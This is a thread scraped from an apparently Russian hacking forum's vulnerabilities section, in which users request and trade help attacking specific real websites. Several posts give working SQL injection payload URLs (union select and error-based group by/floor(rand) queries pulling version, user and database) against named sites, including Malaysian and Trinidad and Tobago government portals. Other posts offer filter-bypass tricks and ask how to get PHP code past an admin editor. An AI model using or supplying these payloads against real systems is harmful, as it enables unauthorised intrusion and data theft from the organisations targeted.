Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    843
    Likes Received:
    170
    Reputations:
    84
    http://pressfortruth.ca/dvd_dtls.php?rid=1%27+group+by+15+--+
     
  2. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    Это делается так

     
    2 people like this.
  3. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    843
    Likes Received:
    170
    Reputations:
    84
    er9j6@
    Спасибо. Где можно получить подробности об этом способе?
     
  4. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,158
    Likes Received:
    423
    Reputations:
    231
    Это просто обход фильтров :) /*! */ () и т.д.
     
  5. dumpers_team

    dumpers_team New Member

    Joined:
    28 Sep 2011
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Подскажите плиз, есть несколько сайтов, вроде как есть скули, но на сайтах стоит SEF, так что вижу только линки типа _http://site.com/london/1'

    Как просмотреть полный путь можно?
     
  6. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    651
    Likes Received:
    160
    Reputations:
    81
    Скорее всего, дефолтные значения вроде index.php и т.п..
    А вообще, чем тебе так мешает? хевидж не берёт? :D
    Ещё отснифить можно...
     
  7. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Code:
    http://www.terengganu.gov.my/maxc2020/portal/cms/redang/index_news.displaynews.php?counthit=1%27&newsid=10%27&from=search%27&cid=1%27&searchterm
    Got this vuln, no where to start?
     
  8. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    123
    Likes Received:
    34
    Reputations:
    55
    Code:
    http://www.terengganu.gov.my/maxc2020/portal/cms/redang/index_news.displaynews.php?newsid=-10'+union+select+1,2,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29/*
    
    the site is vulnerable, then the most common sql

    интересно, чем и как ты будешь снифать чтобы узнать что скрываеться под чпу ?

    Тебе остается только угадывать. Я не не разу не видел и не использовал sef, не знаю точно как он работает, качать исходники лень, но ссылки у джомлы однотипны, даже в плагинах почти всегда одни и теже параметры встречаются. Так что попробуй что то типа такого
    Code:
    /index.php?option=com_virtuemart&Itemid=97
    /index.php?option=com_content&task=view&id=524&Itemid=271
    
    может и повезет
     
  9. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Thank you so much.

    I have a String Based problem again.

    Code:
    http://motorcitydolls.net/partygal.php?id=-17
    Not sure for a solution. Any help?
     
  10. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,778
    Likes Received:
    853
    Reputations:
    857
    I think that its not vulnerable
     
    _________________________
  11. meskaline

    meskaline New Member

    Joined:
    9 Dec 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    В редакторе в админке при добавлении вот такого кода <?php echo "biu-biu"; ?> сохраняется вот такая штука <!--?php echo "biu-biu"; ?--> как обойти её?
     
  12. system331

    system331 New Member

    Joined:
    18 Dec 2008
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    есть такой скрипт http://funny-shirt.ru/cat/110/page/1
    если прописать так http://funny-shirt.ru/cat/110/page/199999999999999999999999999999999999999999 вадыеш sql ошибку.
    но буквы режет, цыфры принимает, помогите раскрутить
     
  13. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    это не скуля

    _http://funny-shirt.ru/cat/110/page/1*1
    _http://funny-shirt.ru/cat/110/page/1*2
     
  14. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    651
    Likes Received:
    160
    Reputations:
    81
    Обновим страничку (во время запущенного сниффера), и по идее, высвечивается полный адрес ;)
     
  15. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,599
    Likes Received:
    1,308
    Reputations:
    1,557
    Где найти такой сниффер? (или отсыпь хотя бы то, что ты постоянно куришь) :cool:
     
    3 people like this.
  16. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    130
    Likes Received:
    9
    Reputations:
    2
    Есть чтонить под
    FreeBSD 8.1-RELEASE-p5 #10: Fri Sep 30 2011 ?
     
  17. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,158
    Likes Received:
    423
    Reputations:
    231
    В паблике точно нету..
     
  18. RFOPlayer

    RFOPlayer New Member

    Joined:
    11 Dec 2011
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    при запросе:
    выдается ошибка:
    что не так делаю?
     
  19. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,675
    Likes Received:
    1,028
    Reputations:
    1,228
    пробовал?

    а у тебя просто прав имхо нет
     
    _________________________
  20. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    843
    Likes Received:
    170
    Reputations:
    84
    www.finance.gov.tt/publications.php?mid=192+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+--+
    Ministry of Finance, Republic of Trinidad and Tobago не хочет крититься...
     
Loading...
Thread Status:
Not open for further replies.